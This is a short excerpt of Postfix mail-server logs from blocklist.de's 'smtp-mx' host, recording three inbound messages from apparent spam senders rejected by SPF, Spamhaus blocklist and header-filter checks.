Mar 20 07:08:07 smtp-mx postfix/smtpd[15898]: NOQUEUE: reject: RCPT from unknown[201.73.148.20]: 550 5.7.1 <postmaster@blocklist.de>: Recipient address rejected: Please see http://www.openspf.org/Why?s=mfrom;id=dafiti%40gvgvv.com.br;ip=201.73.148.20;r=smtp-mx.blocklist.de; from=<dafiti@gvgvv.com.br> to=<postmaster@blocklist.de> proto=SMTP helo=<jmendes.com.br>
Mar 20 07:08:10 smtp-mx postfix/smtpd[15561]: NOQUEUE: reject: RCPT from unknown[201.30.165.34]: 554 5.7.1 Service unavailable; Client host [201.30.165.34] blocked using sbl-xbl.spamhaus.org; http://www.spamhaus.org/query/bl?ip=201.30.165.34; from=<bounce-30644-12669464-5960-248@bangmax.com.br> to=<postmaster@blocklist.de> proto=SMTP helo=<embrasil.com.br>
Mar 20 07:08:58 smtp-mx postfix/cleanup[15929]: 976F8D5943F85: reject: header Message-ID: <ee5e6dfa82664ef97b3debab3faf58ca@localhost.localdomain> from unknown[186.215.253.93]; from=<bounce-2696-19326188-4124-248@hiperlux.com.br> to=<postmaster@blocklist.de> proto=SMTP helo=<irmadulce.org.br>: 5.7.1 NOQUEUE: reject: This Message is not allowed here